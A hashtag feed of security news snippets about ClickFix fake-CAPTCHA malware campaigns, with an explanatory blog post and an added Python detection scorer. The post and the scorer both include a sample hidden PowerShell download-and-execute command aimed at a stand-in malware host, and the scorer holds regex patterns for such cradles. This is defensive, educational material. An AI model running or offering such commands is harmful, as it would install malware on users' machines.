#clickfix
Awakari App

Cloudflare-Themed ClickFix Attack Drops Infiniti Stealer on Macs The infection chain includes a fake CAPTCHA page, a Bash script, a Nuitka loader, and the Python-based infostealer. The post Cloudfl...

#Malware #& #Threats #ClickFix #infostealer #Mac #malware


Beware of the SmartApeSG campaign using ClickFix to deploy multiple malware strains like Remcos RAT and StealC. Stay vigilant and educate users on social engineering tactics. #CyberSecurity #MalwareAlert #ClickFix Link: thedailytechfeed.com/smartapesg-c...

LeakNet Ransomware Uses ClickFix and Deno for Stealthy Attacks

LeakNet ransomware has changed its approach by pairing ClickFix social-engineering lures with a Deno-based loader, making its intrusion chain harder to spot. The group is using compromised websites to trick users into running malicious commands, then executing payloads in memory to reduce obvious traces on disk.

Security researchers say this is a notable shift because ClickFix replaces older access methods like stolen credentials with a user-triggered infection path. Once the victim interacts with the fake prompt, scripts such as PowerShell and VBS can launch the next stage, often with misleading file names that look routine rather than malicious.

The Deno runtime is the second major piece of the campaign. Deno is a legitimate JavaScript and TypeScript runtime, but LeakNet is abusing it in a “bring your own runtime” style so it can run Base64-encoded code directly in memory, fingerprint the host, contact command-and-control servers, and repeatedly fetch additional code.

That design helps the attackers stay stealthy because it minimizes the amount of malware written to disk and can blend in with normal software activity better than a custom loader might. Researchers also note that LeakNet is building a repeatable post-exploitation flow that can include lateral movement, payload staging, and eventually ransomware deployment.

For organizations, the primary threat is that traditional file-based detection may miss the earliest stages of the attack. A campaign that starts with a convincing browser prompt or a fake verification page can quickly turn into an internal breach if users are not trained to question unexpected instructions.

Safety recommendations

To mitigate the threat, companies should train users to avoid following browser-based “fix” prompts, especially on unfamiliar or compromised sites. They should also restrict PowerShell, VBS, and other script interpreters where possible, monitor for Deno running outside developer workflows, watch for unusual PsExec or DLL sideloading activity, and segment networks so one compromised host cannot easily spread access. Finally, maintain tested offline backups and keep a playbook for rapid isolation, because fast containment is often the difference between a blocked intrusion and a full ransomware incident.

LeakNet Ransomware Uses ClickFix and Deno for Stealthy Attacks #ClickFix #CyberAttacks #Deno


"EtherRAT & SYS_INFO Module: C2 on Ethereum (EtherHiding), Target Selection, CDN-Like Beacons" published by eSentire. #ClickFix, #EtherHiding, #EtherRAT, #DPRK, #CTI www.esentire.com/blog/etherrat-sys-info-m...

ClickFix Campaigns Targeting Windows and macOS Insikt Group tracked five ClickFix clusters that use fraudulent human‑verification lures to trick victims into copying and executing obfuscated commands in native tools like the Windows Run dialog and macOS Terminal. These campaigns leverage living‑off‑the‑land binaries and in‑memory execution to stage payloads such as NetSupport RAT and MacSync while operating via disposable, often Cloudflare‑protected infrastructure to maintain continuity. #ClickFix #NetSupportRAT

Insikt Group tracks five ClickFix clusters using fake human-verification lures to run obfuscated commands on Windows and macOS. Payloads include NetSupport RAT and MacSync via in-memory execution. #ClickFix #InMemoryAttack #USA

ClickFix Campaigns Target Win/macOS

~Recordedfuture~
Fake verification prompts trick users into running malicious commands via native tools, bypassing browser security to deploy RATs.
-
IOCs: 62. 164. 177. 230, 152. 89. 244. 70, 45. 144. 233. 192
-
#ClickFix #Malware #ThreatIntel


Your WordPress site looks clean to you. Your visitors see a fake Cloudflare CAPTCHA telling them to run PowerShell. That's ClickFix.

Runbook:
https://go.enginyr.ing/spn/dzlEH

#ServerSpan #WordPress #CyberSecurity #Malware #ClickFix #SysAdmin #VPS


"NICKEL ALLEY strategy: Fake it ‘til you make it" published by Sophos. #NickelAlley, #ClickFix, #ContagiousInterview, #PylangGhost, #DPRK, #CTI www.sophos.com/en-us/blog/nickel-alley-...

NICKEL ALLEY Fake Job Campaigns

~Sophos~
DPRK's NICKEL ALLEY targets tech workers with fake job interviews and ClickFix tactics to deploy PyLangGhost RAT.
-
IOCs: 95. 169. 180. 140, 144. 172. 93. 88, talentacq. pro
-
#ClickFix #NICKELALLEY #ThreatIntel

Termite Ransomware Linked to Velvet Tempest's ClickFix, CastleRAT Attacks

Cyber threat actors known as Velvet Tempest have been observed deploying sophisticated attacks involving Termite ransomware, utilizing the ClickFix social engineering technique and the CastleRAT backdoor. These intrusions, tracked by MalBeacon researchers, unfolded over 12 days in a simulated U.S. non-profit environment with over 3,000 endpoints. Velvet Tempest, active for at least five years, has affiliations with major ransomware strains like Ryuk, REvil, Conti, BlackCat, LockBit, and RansomHub.

The attacks begin with malvertising campaigns directing victims to fake CAPTCHA pages that trick users into pasting obfuscated PowerShell commands into the Windows Run dialog. This ClickFix method bypasses browser security features, chaining cmd.exe processes and using legitimate tools like finger.exe to fetch malware loaders, often disguised as PDF archives. Subsequent stages involve PowerShell downloads, .NET compilation via csc.exe, and Python-based persistence in ProgramData directories.

Once inside, attackers conduct Active Directory reconnaissance, host discovery, and credential harvesting from Chrome browsers using hosted PowerShell scripts linked to Termite staging servers. They deploy DonutLoader to retrieve CastleRAT, a remote access trojan that steals credentials, logs keystrokes, captures screens, and employs UAC bypass via trusted binaries like ComputerDefaults.exe. CastleRAT hides its command-and-control servers using Steam Community profiles as dead-drop resolvers, blending traffic with legitimate web activity.

Although ransomware deployment was not observed in this intrusion, Termite, a Babuk-based variant that emerged in late 2024, employs double-extortion by exfiltrating data before encrypting files. It deletes shadow copies with vssadmin.exe, empties the Recycle Bin, and targets high-profile victims like SaaS provider Blue Yonder and Australian IVF firm Genea. The group exploits vulnerabilities, such as those in Cleo's file transfer software, for initial access via phishing or compromised sites.

Organizations should prioritize defenses against ClickFix by training users on suspicious prompts, monitoring PowerShell abuse, and blocking anomalous tool executions like finger.exe or csc.exe. Implementing deception environments, as used by MalBeacon, aids early detection of such hands-on-keyboard activities. With Velvet Tempest's history of devastating breaches, vigilance against evolving ransomware tactics remains critical in 2026.

Termite Ransomware Linked to Velvet Tempest's ClickFix, CastleRAT Attacks #CastleRAT #ClickFix #CyberAttacks

Fake CAPTCHA Campaign: Inside a Multi-Stage Stealer Assault LevelBlue documents a multi-stage, fileless ClickFix campaign that compromises legitimate websites to present fake CAPTCHA prompts which coerce users into executing clipboard-pasted PowerShell commands, enabling in-memory payload delivery via Donut shellcode. The infrastructure is payload-agnostic and rotates multiple commodity stealers and a cryptocurrency clipboard hijacker across numerous C2 servers and fake crypto-exchange sites. #ClickFix #LummaStealer

A multi-stage stealer attack uses compromised legitimate sites to show fake CAPTCHA prompts, tricking users into running clipboard-pasted PowerShell commands delivering in-memory payloads via Donut shellcode. #ClickFix #CryptoHijack #LummaStealer


LeakNet escalates ransomware attacks using ClickFix lures and a stealthy Deno-based loader, challenging traditional cybersecurity defenses. #CyberSecurity #Ransomware #LeakNet #ClickFix #DenoLoader Link: thedailytechfeed.com/leaknet-ampl...


LeakNet ransomware adopts ClickFix tactics and Deno in-memory loaders for stealthy attacks. Stay vigilant against evolving cyber threats. #CyberSecurity #Ransomware #ClickFix #Deno Link: thedailytechfeed.com/leaknet-rans...

LeakNet ransomware uses ClickFix and Deno runtime for stealthy attacks The LeakNet ransomware gang is now using the ClickFix technique for initial access into corporate environments and deploys a malware loader based on the open-source Deno runtime for JavaScript and TypeScript.

#LeakNet #ransomware uses #ClickFix, #Deno runtime in stealthy attacks

www.bleepingcomputer.com/news/security/leaknet-ra...

#cybersecurity

New ClickFix Scam Tricks Users Into Mapping Hacker-Controlled Drives A new ClickFix scam tricks Windows users into running hidden commands that map hacker-controlled drives and load malware through trusted apps.

Watch out as a new ClickFix scam tricks Windows users into running hidden commands that map hacker-controlled drives and load malware through trusted apps.

Read: hackread.com/clickfix-sca...

#CyberSecurity #ClickFix #Windows #Malware #Scam

LeakNet Ransomware Uses ClickFix via Hacked Sites Deploys Deno In-Memory Loader defenders something tangible to work with read more about LeakNet Ransomware Uses ClickFix via Hacked Sites Deploys Deno In-Memory Loader

LeakNet Ransomware Uses ClickFix via Hacked Sites Deploys Deno In-Memory Loader reconbee.com/leaknet-rans...

#LeakNetransomware #ransomwareattack #ClickFix #hacked #cybersecurity #cyberattack

LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials.

iT4iNT SERVER LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader VDS VPS Cloud #Ransomware #CyberSecurity #LeakNet #ClickFix #Malware

ClickFix Attack Targets Devs with MacSync Malware via Fake Claude Tools Cybersecurity researchers at 7AI have revealed a new Claude Fraud campaign in which hackers use fake AI extensions and Google ads to steal data from tech professionals.

Watch out as hackers are abusing fake Claude AI tools in a #ClickFix campaign to spread MacSync infostealer malware via #GoogleAds.

Read: hackread.com/clickfix-att...

#CyberSecurity #Infostealer #AI #Claude #MacOS

Original post on securityaffairs.com

From Windows to macOS: ClickFix attacks shift tactics with ChatGPT-based lures ClickFix campaigns are evolving, with attackers increasingly targeting macOS users and deploying more advanced infoste...

#Artificial #Intelligence #Breaking #News #Cyber […]



Cyberattackers have evolved the ClickFix technique, exploiting network drives and Electron apps to deploy malware. Stay informed and protect your systems. #CyberSecurity #ClickFix #MalwareAlert Link: thedailytechfeed.com/advanced-cli...


A 'Free Photoshop' scam on #TikTok is stealing people's data: zorz.it/OABup

#JeremyGray #FreePhotoshop #AdobePhotoshop #ClickFix #CyberCriminals #Microsoft #Photoshop #scam #SocialMedia


macOS users increasingly targeted by social engineering attacks

#Authentifizierung #ClickFix #Cybersecurity #Cybersicherheit #GenAI #MacOS #Phishing #SocialEngineering @Sophos @Sophos_info

netzpalaver.de/2026/...


Mac users, beware! Fake CAPTCHAs are tricking users into running malicious Terminal commands. Stay vigilant and never execute commands from untrusted sources. #CyberSecurity #MacOS #ClickFix Link: thedailytechfeed.com/fake-captcha...

ClickFix Campaigns Target macOS with MacSync Stealer

~Sophos~
Attackers use fake ChatGPT lures and ClickFix tactics to trick macOS users into installing the MacSync infostealer, targeting crypto wallets.
-
IOCs: mymachub. com, mymacsoft. com, mac-faster. com
-
#ClickFix #Infostealer #ThreatIntel #macOS


Online ads for Anthropic's Claude Code, supposedly sponsored by Google, pave the way for malware

#Anthropic @Bitdefender_DE #ClaudeCode #ClickFix #Cybersecurity #Cybersicherheit #Malware @Bitdefender

netzpalaver.de/2026/...


VodkaStealer Malware Harvests Browser Credentials and Session Token Threat Group – Unidentified financially motivated threat actor associated with the ClickFix WordPress compromise campaign Threa...

#Malware #ClickFix #Credential #Theft

Hackers Turn Trusted Websites Into Malware Launchpads Over 250 compromised WordPress websites are distributing infostealer malware through fake security prompts in a global attack targeting users in 12 countries.

Hackers Turn Trusted Websites Into Malware Launchpads

#Cybersecurity #Malware #WordPress #ClickFix #AusNews

thedailyperspective.org/article/2026-03-10-hacke...

Fixing ClickFix

There’s a very potent, very effective new malware delivery mechanism dubbed ClickFix, accounting for over half of all infections last year. I’ll tell you how to avoid it – and why you shouldn’t have to.

## What is ClickFix?

We’re getting used to seeing CAPTCHAs that make us do weird things to prove that we’re real humans. (This is becoming increasingly ironic as we deploy “agentic” AI bots to do things on our behalves.) But the bad guys have come up with a devilishly clever way to exploit this and similar situations to trick us into installing malware. The attack is called “ClickFix”, though there are other variants.

So, how does this work? The bad guys need to get you to a malicious web page. This can happen in many ways, from clicking on a malicious ad (called “malvertising”), or a “sponsored” link in search results, or a link from a phishing email – either in the email itself or in an attached file. You may also run across scams like this on shady sites, like for pirated software or movies. But however you get there, you will see some sort of message or error along these lines:

* Please verify that you’re a human (CAPTCHA)
* Browser verification failed
* Additional verification required
* Please run this command to continue
* App has crashed, run this command to scan for problems or fix the issue

An actual ClickFix example is shown below.

Actual ClickFix example

## How ClickFix Works

When you’re in a web browser on a desktop computer, you have several layers of protection. Browsers are “sandboxed” and can’t directly run commands on your computer. Most have some sort of download protections, including marking any file downloaded from the internet with a “mark of the web”. This mark tells your computer to be extra careful when opening these documents, particularly if they try to install something or run commands. And some of us have third party antivirus software (though I don’t recommend this) that would also try to prevent you from downloading malware.

But ClickFix works by tricking you into bypassing all of these protections. Let’s look at the example above. Here’s what is actually going on.

1. The malicious web page that shows this message has automatically loaded your system clipboard with a computer command. That is, the page has surreptitiously copied some hidden text so that it’s ready to paste.
2. The “Win + R” key combination on a Windows computer will open up a Run dialog which allows you to execute commands as text (as opposed to the usual graphical user interface).
3. The “Ctrl + V” key combination will paste the contents of the clipboard into the Run dialog. This is the malicious computer command that was pre-copied to the clipboard when you visited the attacker’s web page.
4. And finally, hitting “Enter” will tell your computer to execute the malicious command.

The command itself is often obfuscated so it’s difficult to tell what it’s really doing. Here’s an example command:

```
powershell -NoP -W Hidden -C $a="https://mal"; $b="waresite.com/update"; $u=$a+$b; iex (irm $u) # browser verification step
```

This command opens a (hidden) PowerShell window, downloads a malicious command from a website (which is obfuscated by breaking it into two parts) and executes the command. You’ve just told your computer to install malware, which it will happily do. If the command is really long, like this one, it will scroll to the end and all you might see is the benign-looking comment at the end.

You might also be asked to open File Explorer because you can paste and run commands in the address bar. On a Mac, you’d be asked to open a Terminal window instead of a Run dialog. All different ways to do the same thing.

## Fixing ClickFix

So, now that you know how this works, the solution is to just ignore the directions like this, no matter how authentic they look or how dire or innocuous they sound. Close the web page and pat yourself on the back.

But here’s the bottom line: you shouldn’t _have_ to worry about this. This is a failing of the operating system (OS). Apple and Microsoft need to address this problem in macOS and Windows, and they should do it ASAP. How? I can think of a few ideas…

1. Everything copied to the clipboard (anything that can be subsequently pasted) should know and remember where it came from. Any text placed on your clipboard by a website should be flagged as suspicious (like the ‘mark of the web’). Your OS should then warn you before pasting this text into a Run dialog, Terminal window, or anywhere else that could execute a computer command.
2. You should have an easy way to inspect the content of your clipboard (without having to paste it somewhere), including the provenance of what’s stored there.
3. Web browsers should not be able to automatically put text on your clipboard without any user action whatsoever. It should at least be a setting you can toggle (defaulting to not allowing it).

People that do a lot of computer programming copy and paste commands to run all the time. I know I do. So we would need some ways to disable constant warnings in those cases, maybe for a limited amount of time (‘stop warning me for 2 hours’). But by default, the OS should be making it a lot harder to paste commands from the web into a terminal and execute them. We should not be counting on training billions of people to avoid ClickFix-style attacks.

Fixing #ClickFix

https://firewallsdontstopdragons.com/fixing-clickfix/

#cybersecurity #guide

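The Run-dialog chain described in the post above (explorer.exe spawning a hidden PowerShell, a URL split across variables, a download-and-execute cradle, and a trailing comment that hides the real command) is something a defender can score from process-creation telemetry. The following is an added example, not code from the post or from Firewalls Don't Stop Dragons; the sample events, the Sysmon-style field names (Image, ParentImage, CommandLine) and the indicator weights are assumptions.

```python
"""Heuristic scorer for ClickFix-style Run-dialog launches (added example)."""
import re

# Exec + fetch both present = download-and-execute cradle (either order).
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b", re.I)

# (name, weight, regex); weights are an assumption, not a vendor scale.
INDICATORS = [
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile_or_bypass", 1, re.compile(r"-(?:nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)),
    # $a="https://..."; $b=...  -> URL split into pieces to defeat eyeballing
    ("split_url", 2, re.compile(r'\$\w+\s*=\s*"https?://[^"]*"\s*;\s*\$\w+\s*=', re.I)),
    # benign-looking comment at the end, all a user sees after the Run box scrolls
    ("trailing_comment", 1, re.compile(r"#\s*\S.*$")),
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R launches its command via explorer.exe
ALERT_THRESHOLD = 5                     # assumed cut-off; parent alone never alerts


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    if _basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return 0, []
    cmd = event.get("CommandLine", "")
    hits, score = [], 0
    if _basename(event.get("ParentImage", "")) in RUN_DIALOG_PARENTS:
        hits.append("run_dialog_parent"); score += 2
    if EXEC_RE.search(cmd) and FETCH_RE.search(cmd):
        hits.append("download_cradle"); score += 3
    for name, weight, rx in INDICATORS:
        if rx.search(cmd):
            hits.append(name); score += weight
    return score, hits


def detect(events):
    """Return alerts (id, score, hits) for events at or above ALERT_THRESHOLD."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"id": ev["id"], "score": score, "hits": hits})
    return alerts


# Constructed sample events: evt-1 is the post's example command launched from Win+R.
EVENTS = [
    {"id": "evt-1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -NoP -W Hidden -C $a="https://mal"; $b="waresite.com/update"; '
                    '$u=$a+$b; iex (irm $u) # browser verification step'},
    {"id": "evt-2", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": r"powershell.exe -NoProfile -File .\build.ps1"},
    {"id": "evt-3", "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
     "CommandLine": "pwsh -Command Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
    {"id": "evt-4", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell"},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)  # only evt-1 crosses the threshold
```

Events 2 to 4 show why the parent process or a single download verb is not enough on its own: an interactive user typing `powershell` into Run, or an admin fetching a file from a terminal, scores below the cut-off.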
New ClickFix Attack Wave Targeting Windows Systems to Deploy StealC Stealer Fake CAPTCHA pages trick Windows users into running PowerShell, deploying StealC malware to steal sensitive data.

🚨 Cross-scripted FAKE CAPTCHA launches #StealC malware exploit:

"This #ClickFix technique exploits user trust, making victims believe they are completing a routine security check when they are actually launching malware."

cybersecuritynews.com/new-clickfix...

Termite ransomware breaches linked to ClickFix CastleRAT attacks Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor.

#Termite #ransomware breaches linked to #ClickFix #CastleRAT attacks

www.bleepingcomputer.com/news/security/termite-ra...

#cybersecurity
